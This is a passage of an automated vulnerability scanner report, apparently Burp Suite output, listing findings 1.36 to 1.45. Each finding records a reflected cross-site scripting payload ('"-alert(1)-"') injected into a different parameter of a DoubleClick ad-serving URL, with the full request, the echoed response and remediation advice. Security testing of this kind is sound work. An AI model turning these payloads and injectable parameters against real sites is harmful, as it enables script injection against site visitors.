Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://news.cnet.com/8301-27080_3-20012253-245.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c0163e92e0000c2||t=1290273585|et=730|cs=hcd3kvix

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:04:57 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6820

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Thu Aug 19 07:11:30 EDT 2010 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
ick.net/click%3Bh%3Dv8/3a5a/17/16c/%2a/s%3B231242665%3B0-0%3B0%3B55844900%3B3454-728/90%3B38009998/38027755/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8023&sg=476622&o=10784%253a27080%253a&h=cna34fd"-alert(1)-"bc95ae28570&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=00phx1-ad-e17:4CE96ADF1F86A4&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.
...[SNIP]...

1.36. http://ad.vulnerable.ad.partner/adi/N5295.150723.CBSI/B4885922.2 [l parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adi/N5295.150723.CBSI/B4885922.2

Issue detail

The value of the l request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1ec90"-alert(1)-"2a0e5843a31 was submitted in the l parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5295.150723.CBSI/B4885922.2;sz=728x90;click0=http://adlog.com.com/adlog/e/r=8023&sg=476622&o=10784%253a27080%253a&h=cn&p=2&b=5&l=en_US1ec90"-alert(1)-"2a0e5843a31&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=00phx1-ad-e17:4CE96ADF1F86A4&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.20&event=58/;ord=2010.11.21.21.24.20? HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://news.cnet.com/8301-27080_3-20012253-245.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c0163e92e0000c2||t=1290273585|et=730|cs=hcd3kvix

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:05:58 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6820

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Thu Aug 19 07:11:30 EDT 2010 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
h%3Dv8/3a5a/17/16c/%2a/s%3B231242665%3B0-0%3B0%3B55844900%3B3454-728/90%3B38009998/38027755/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8023&sg=476622&o=10784%253a27080%253a&h=cn&p=2&b=5&l=en_US1ec90"-alert(1)-"2a0e5843a31&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=00phx1-ad-e17:4CE96ADF1F86A4&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI
...[SNIP]...

1.37. http://ad.vulnerable.ad.partner/adi/N5295.150723.CBSI/B4885922.2 [nd parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adi/N5295.150723.CBSI/B4885922.2

Issue detail

The value of the nd request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9c30a"-alert(1)-"784b7949c15 was submitted in the nd parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5295.150723.CBSI/B4885922.2;sz=728x90;click0=http://adlog.com.com/adlog/e/r=8023&sg=476622&o=10784%253a27080%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=270809c30a"-alert(1)-"784b7949c15&pid=&cid=20012253&pp=100&e=3&rqid=00phx1-ad-e17:4CE96ADF1F86A4&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.20&event=58/;ord=2010.11.21.21.24.20? HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://news.cnet.com/8301-27080_3-20012253-245.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c0163e92e0000c2||t=1290273585|et=730|cs=hcd3kvix

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:07:31 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6820

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Thu Aug 19 07:12:13 EDT 2010 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
%3B231242665%3B1-0%3B0%3B55844900%3B3454-728/90%3B38010000/38027757/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8023&sg=476622&o=10784%253a27080%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=270809c30a"-alert(1)-"784b7949c15&pid=&cid=20012253&pp=100&e=3&rqid=00phx1-ad-e17:4CE96ADF1F86A4&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11
...[SNIP]...

1.38. http://ad.vulnerable.ad.partner/adi/N5295.150723.CBSI/B4885922.2 [o parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adi/N5295.150723.CBSI/B4885922.2

Issue detail

The value of the o request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 720cf"-alert(1)-"0b86199db39 was submitted in the o parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5295.150723.CBSI/B4885922.2;sz=728x90;click0=http://adlog.com.com/adlog/e/r=8023&sg=476622&o=10784%253a27080%253a720cf"-alert(1)-"0b86199db39&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=00phx1-ad-e17:4CE96ADF1F86A4&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.20&event=58/;ord=2010.11.21.21.24.20? HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://news.cnet.com/8301-27080_3-20012253-245.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c0163e92e0000c2||t=1290273585|et=730|cs=hcd3kvix

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:04:37 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6820

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Thu Aug 19 07:11:30 EDT 2010 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
bleclick.net/click%3Bh%3Dv8/3a5a/17/16c/%2a/s%3B231242665%3B0-0%3B0%3B55844900%3B3454-728/90%3B38009998/38027755/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8023&sg=476622&o=10784%253a27080%253a720cf"-alert(1)-"0b86199db39&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=00phx1-ad-e17:4CE96ADF1F86A4&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121
...[SNIP]...

1.39. http://ad.vulnerable.ad.partner/adi/N5295.150723.CBSI/B4885922.2 [oepartner parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adi/N5295.150723.CBSI/B4885922.2

Issue detail

The value of the oepartner request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 6bef2"-alert(1)-"ffd927cd787 was submitted in the oepartner parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5295.150723.CBSI/B4885922.2;sz=728x90;click0=http://adlog.com.com/adlog/e/r=8023&sg=476622&o=10784%253a27080%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=00phx1-ad-e17:4CE96ADF1F86A4&orh=wired.com&oepartner=6bef2"-alert(1)-"ffd927cd787&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.20&event=58/;ord=2010.11.21.21.24.20? HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://news.cnet.com/8301-27080_3-20012253-245.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c0163e92e0000c2||t=1290273585|et=730|cs=hcd3kvix

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:10:46 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6820

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Thu Aug 19 07:11:30 EDT 2010 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
http://adlog.com.com/adlog/e/r=8023&sg=476622&o=10784%253a27080%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=00phx1-ad-e17:4CE96ADF1F86A4&orh=wired.com&oepartner=6bef2"-alert(1)-"ffd927cd787&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.20&event=58/http://www.google.com/chrome/?brand=CHIH&utm_campaign=en&utm_sourc
...[SNIP]...

1.40. http://ad.vulnerable.ad.partner/adi/N5295.150723.CBSI/B4885922.2 [orh parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adi/N5295.150723.CBSI/B4885922.2

Issue detail

The value of the orh request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b4a7c"-alert(1)-"431c9d2872f was submitted in the orh parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5295.150723.CBSI/B4885922.2;sz=728x90;click0=http://adlog.com.com/adlog/e/r=8023&sg=476622&o=10784%253a27080%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=00phx1-ad-e17:4CE96ADF1F86A4&orh=wired.comb4a7c"-alert(1)-"431c9d2872f&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.20&event=58/;ord=2010.11.21.21.24.20? HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://news.cnet.com/8301-27080_3-20012253-245.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c0163e92e0000c2||t=1290273585|et=730|cs=hcd3kvix

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:10:28 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6820

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Thu Aug 19 07:11:30 EDT 2010 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8023&sg=476622&o=10784%253a27080%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=00phx1-ad-e17:4CE96ADF1F86A4&orh=wired.comb4a7c"-alert(1)-"431c9d2872f&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.20&event=58/http://www.google.com/chrome/?brand=CHIH&utm_campaign=e
...[SNIP]...

1.41. http://ad.vulnerable.ad.partner/adi/N5295.150723.CBSI/B4885922.2 [p parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adi/N5295.150723.CBSI/B4885922.2

Issue detail

The value of the p request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1bee6"-alert(1)-"81ed37232b7 was submitted in the p parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5295.150723.CBSI/B4885922.2;sz=728x90;click0=http://adlog.com.com/adlog/e/r=8023&sg=476622&o=10784%253a27080%253a&h=cn&p=21bee6"-alert(1)-"81ed37232b7&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=00phx1-ad-e17:4CE96ADF1F86A4&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.20&event=58/;ord=2010.11.21.21.24.20? HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://news.cnet.com/8301-27080_3-20012253-245.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c0163e92e0000c2||t=1290273585|et=730|cs=hcd3kvix

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:05:15 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6820

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Thu Aug 19 07:11:30 EDT 2010 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
net/click%3Bh%3Dv8/3a5a/17/16c/%2a/s%3B231242665%3B0-0%3B0%3B55844900%3B3454-728/90%3B38009998/38027755/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8023&sg=476622&o=10784%253a27080%253a&h=cn&p=21bee6"-alert(1)-"81ed37232b7&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=00phx1-ad-e17:4CE96ADF1F86A4&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&p
...[SNIP]...

1.42. http://ad.vulnerable.ad.partner/adi/N5295.150723.CBSI/B4885922.2 [pdom parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adi/N5295.150723.CBSI/B4885922.2

Issue detail

The value of the pdom request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 562b5"-alert(1)-"2c378b10046 was submitted in the pdom parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5295.150723.CBSI/B4885922.2;sz=728x90;click0=http://adlog.com.com/adlog/e/r=8023&sg=476622&o=10784%253a27080%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=00phx1-ad-e17:4CE96ADF1F86A4&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com562b5"-alert(1)-"2c378b10046&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.20&event=58/;ord=2010.11.21.21.24.20? HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://news.cnet.com/8301-27080_3-20012253-245.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c0163e92e0000c2||t=1290273585|et=730|cs=hcd3kvix

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:11:39 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6820

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Thu Aug 19 07:12:13 EDT 2010 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
476622&o=10784%253a27080%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=00phx1-ad-e17:4CE96ADF1F86A4&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com562b5"-alert(1)-"2c378b10046&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.20&event=58/http://www.google.com/chrome/?brand=CHIH&utm_campaign=en&utm_source=en-oa-na-us-N5295.150723.CBSI&utm_med
...[SNIP]...

1.43. http://ad.vulnerable.ad.partner/adi/N5295.150723.CBSI/B4885922.2 [pg parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adi/N5295.150723.CBSI/B4885922.2

Issue detail

The value of the pg request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload fae52"-alert(1)-"3dcf514d1d0 was submitted in the pg parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5295.150723.CBSI/B4885922.2;sz=728x90;click0=http://adlog.com.com/adlog/e/r=8023&sg=476622&o=10784%253a27080%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=00phx1-ad-e17:4CE96ADF1F86A4&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFIfae52"-alert(1)-"3dcf514d1d0&t=2010.11.21.21.24.20&event=58/;ord=2010.11.21.21.24.20? HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://news.cnet.com/8301-27080_3-20012253-245.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c0163e92e0000c2||t=1290273585|et=730|cs=hcd3kvix

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:12:48 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6820

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Thu Aug 19 07:11:30 EDT 2010 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
1&nd=27080&pid=&cid=20012253&pp=100&e=3&rqid=00phx1-ad-e17:4CE96ADF1F86A4&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFIfae52"-alert(1)-"3dcf514d1d0&t=2010.11.21.21.24.20&event=58/http://www.google.com/chrome/?brand=CHIH&utm_campaign=en&utm_source=en-oa-na-us-N5295.150723.CBSI&utm_medium=oa");
var fscUrl = url;
var fscUrlClickTagFound = false;

...[SNIP]...

1.44. http://ad.vulnerable.ad.partner/adi/N5295.150723.CBSI/B4885922.2 [pid parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adi/N5295.150723.CBSI/B4885922.2

Issue detail

The value of the pid request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload ab0ff"-alert(1)-"2a6292d3f6b was submitted in the pid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5295.150723.CBSI/B4885922.2;sz=728x90;click0=http://adlog.com.com/adlog/e/r=8023&sg=476622&o=10784%253a27080%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=ab0ff"-alert(1)-"2a6292d3f6b&cid=20012253&pp=100&e=3&rqid=00phx1-ad-e17:4CE96ADF1F86A4&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.20&event=58/;ord=2010.11.21.21.24.20? HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://news.cnet.com/8301-27080_3-20012253-245.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c0163e92e0000c2||t=1290273585|et=730|cs=hcd3kvix

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:08:12 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6820

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
<!-- Code auto-generated on Thu Aug 19 07:12:13 EDT 2010 -->
<script src="http://s0.2mdn.net/879366/flashwrite_1_2
...[SNIP]...
1242665%3B1-0%3B0%3B55844900%3B3454-728/90%3B38010000/38027757/1%3B%3B%7Esscs%3D%3fhttp://adlog.com.com/adlog/e/r=8023&sg=476622&o=10784%253a27080%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=ab0ff"-alert(1)-"2a6292d3f6b&cid=20012253&pp=100&e=3&rqid=00phx1-ad-e17:4CE96ADF1F86A4&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.2
...[SNIP]...

1.45. http://ad.vulnerable.ad.partner/adi/N5295.150723.CBSI/B4885922.2 [pp parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://ad.vulnerable.ad.partner
Path:   /adi/N5295.150723.CBSI/B4885922.2

Issue detail

The value of the pp request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 68308"-alert(1)-"d64be5ea104 was submitted in the pp parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /adi/N5295.150723.CBSI/B4885922.2;sz=728x90;click0=http://adlog.com.com/adlog/e/r=8023&sg=476622&o=10784%253a27080%253a&h=cn&p=2&b=5&l=en_US&site=3&pt=8301&nd=27080&pid=&cid=20012253&pp=10068308"-alert(1)-"d64be5ea104&e=3&rqid=00phx1-ad-e17:4CE96ADF1F86A4&orh=wired.com&oepartner=&epartner=&ppartner=&pdom=www.wired.com&cpnmodule=&count=&ra=174.121.222.18&pg=w0nPqQoOYI8AAHuqdI4AAAFI&t=2010.11.21.21.24.20&event=58/;ord=2010.11.21.21.24.20? HTTP/1.1
Accept: image/jpeg, image/gif, image/pjpeg, application/x-ms-application, application/xaml+xml, application/x-ms-xbap, */*
Referer: http://news.cnet.com/8301-27080_3-20012253-245.html
Accept-Language: en-US
User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Accept-Encoding: gzip, deflate
Host: ad.vulnerable.ad.partner
Proxy-Connection: Keep-Alive
Cookie: id=c0163e92e0000c2||t=1290273585|et=730|cs=hcd3kvix

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: text/html
Date: Mon, 22 Nov 2010 00:09:34 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6820

<!-- Copyright 2008 DoubleClick, a division of Google Inc. All rights reserved. -->
